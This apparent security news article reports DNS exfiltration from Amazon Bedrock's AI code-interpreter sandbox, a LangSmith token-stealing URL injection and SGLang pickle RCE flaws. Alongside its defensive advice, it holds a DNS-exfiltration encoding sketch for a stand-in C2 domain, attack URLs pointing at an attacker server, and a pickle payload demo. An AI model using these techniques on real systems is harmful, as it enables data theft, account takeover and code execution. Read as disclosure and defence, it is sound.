AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
Amazon Bedrock Code Interpreter Exposes AI Workloads to DNS Exfiltration Attacks
Cybersecurity researchers have uncovered a serious vulnerability in Amazon Bedrock AgentCore Code Interpreter that could allow attackers to bypass network isolation and exfiltrate sensitive data through DNS queries, a channel that evades traditional network security controls.
BeyondTrust disclosed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries, creating a potential pathway for attackers to establish command-and-control channels and extract data from AI execution environments. The vulnerability carries a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service launched in August 2025 that enables AI agents to execute code in isolated sandbox environments. The service is designed to prevent agentic workloads from accessing external systems, but the DNS query allowance undermines this core security premise.
Kinnaird McQuade, chief security architect at BeyondTrust, explained that this flaw allows “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls.”
In experimental attack scenarios, researchers demonstrated how attackers could exploit this behavior to set up bidirectional communication channels using DNS queries and responses, obtain interactive reverse shells, and exfiltrate sensitive information through DNS queries if their IAM role has permissions to access AWS resources like S3 buckets storing that data.
The attack works by abusing DNS communication to deliver additional payloads to the Code Interpreter, causing it to poll an attacker-controlled DNS command-and-control server for commands stored in DNS A records, execute them, and return the results encoded in DNS subdomain queries.
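To make the exfiltration half of this technique concrete, here is a minimal sketch of how arbitrary bytes can be smuggled out through a DNS lookup. The domain `c2.example.com` and the helper names are illustrative assumptions, not details from BeyondTrust's research; the point is only that resolving the constructed name delivers the encoded payload to whoever runs the domain's authoritative nameserver.

```python
import base64

# Hypothetical attacker-controlled domain (illustrative, not from the research)
C2_DOMAIN = "c2.example.com"

def encode_labels(data: bytes, max_label: int = 63) -> list[str]:
    """Base32-encode data (a DNS-safe alphabet) and split it into
    labels of at most 63 characters, the DNS per-label limit."""
    enc = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    return [enc[i:i + max_label] for i in range(0, len(enc), max_label)]

def exfil_query_name(data: bytes, domain: str = C2_DOMAIN) -> str:
    """Build the DNS name whose resolution leaks `data` to the
    authoritative server for `domain`."""
    return ".".join(encode_labels(data) + [domain])

# Resolving this name (e.g. via socket.getaddrinfo) sends the encoded
# payload to C2_DOMAIN's nameserver, even in a sandbox that blocks direct
# outbound TCP/UDP but still permits DNS resolution.
```

This is also why Route 53 Resolver DNS Firewalls are an effective countermeasure: they can block or alert on resolution of domains outside an allowlist before the query ever leaves the VPC.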
The vulnerability becomes particularly dangerous when services are assigned overprivileged IAM roles. While Code Interpreter requires an IAM role to access AWS resources, simple oversights in role configuration can grant broad permissions to access sensitive data.
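As a point of contrast, a least-privilege role for a Code Interpreter that only needs to read input files might look like the following policy sketch. The bucket name is hypothetical; the key point is scoping to a single action on a single resource rather than granting `s3:*` or attaching a broad managed policy.

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadOnlySpecificBucket",
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::example-agent-inputs/*"
    }
  ]
}
```

With a role like this, even a successful DNS exfiltration channel can only leak the contents of that one bucket, sharply limiting the blast radius.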
“This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters,” BeyondTrust stated. “By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter’s IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure.”
Following responsible disclosure in September 2025, Amazon determined the behavior to be intended functionality rather than a defect. The company recommends customers use VPC mode instead of sandbox mode for complete network isolation and implement DNS firewalls to filter outbound DNS traffic.
Jason Soroko, senior fellow at Sectigo, emphasized the importance of proper configuration: “To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode.”
“Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution,” Soroko added. “Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise.”
LangSmith Account Takeover Vulnerability Discovered
The disclosure comes as Miggo Security revealed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover. The issue affects both self-hosted and cloud deployments and has been addressed in LangSmith version 0.12.71 released in December 2025.
The vulnerability stems from a URL parameter injection flaw due to lack of validation on the baseUrl parameter. This allowed attackers to steal signed-in users’ bearer tokens, user IDs, and workspace IDs through social engineering techniques like tricking victims into clicking specially crafted links.
Attack scenarios include:
- Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted: /studio/?baseUrl=https://attacker-server.com
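The underlying fix for this class of bug is to validate redirect-style parameters against an allowlist before any credentials are attached to a request. Below is a minimal validation sketch under assumed names; `ALLOWED_HOSTS` and `is_safe_base_url` are hypothetical illustrations, not LangSmith's actual patch.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would list its own trusted hosts.
ALLOWED_HOSTS = {"smith.langchain.com", "langsmith.internal.example.com"}

def is_safe_base_url(base_url: str) -> bool:
    """Reject any baseUrl whose scheme or host is not explicitly trusted,
    so bearer tokens are never sent to an attacker-controlled origin."""
    parsed = urlparse(base_url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS
```

Note that the check compares the full hostname, so lookalike domains such as `smith.langchain.com.evil.com` are rejected along with plain-HTTP downgrades.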
Successful exploitation could give attackers unauthorized access to a victim’s trace history, exposing internal SQL queries, CRM customer records, or proprietary source code captured in tool calls.
“A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.
“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails,” the researchers noted.
SGLang Framework Plagued by Multiple RCE Vulnerabilities
Security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models. The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched and stem from unsafe pickle deserialization, potentially resulting in remote code execution.
The flaws include:
- CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s multimodal generation module.
- CVE-2026-3060 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s encoder parallel disaggregation system.
- CVE-2026-3989 (CVSS score: 7.8) – The use of an insecure pickle.load() call without validation or safe deserialization controls in SGLang’s “replay_request_dump.py,” which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said. “The third involves insecure deserialization in a crash dump replay utility.”
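The root cause in all three CVEs is the same well-known pattern: `pickle.loads()` executes arbitrary callables embedded in the byte stream. The self-contained demo below shows the mechanism with a harmless stand-in payload, plus one common hardening pattern (an allowlisting `Unpickler`). This is a generic illustration of the vulnerability class, not SGLang's actual code; the stronger fix is to avoid pickle entirely for untrusted input (e.g. use JSON) or to authenticate the channel.

```python
import io
import pickle

class Malicious:
    def __reduce__(self):
        # A real attacker would return (os.system, ("...",)); harmless
        # arithmetic via eval stands in here to keep the demo side-effect free.
        return (eval, ("2 + 2",))

blob = pickle.dumps(Malicious())
# pickle.loads() blindly invokes the embedded callable: this is the RCE.
result = pickle.loads(blob)  # runs eval("2 + 2") during deserialization

# Mitigation sketch: an Unpickler that only resolves allowlisted globals.
class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED = {("builtins", "range")}  # whatever the service legitimately needs

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
```

Feeding the same malicious blob to `RestrictedUnpickler(io.BytesIO(blob)).load()` raises `UnpicklingError` instead of executing the payload, because `builtins.eval` is not on the allowlist.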
CERT/CC stated that SGLang is vulnerable when the multimodal generation system or encoder parallel disaggregation system is enabled. If an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker.
Users of SGLang are recommended to restrict access to service interfaces, ensure they are not exposed to untrusted networks, implement adequate network segmentation, and use access controls to prevent unauthorized interaction with ZeroMQ endpoints.
While there’s no evidence these vulnerabilities have been exploited in the wild, organizations should monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations, and outbound connections from the SGLang process to unexpected destinations.
Tags: #AmazonBedrock #Cybersecurity #AI #DNSExfiltration #AWS #LangSmith #SGLang #CVE2026 #ZeroMQ #RCE #RemoteCodeExecution #IAM #VPC #SandboxSecurity #AIThreat #DataBreach #CloudSecurity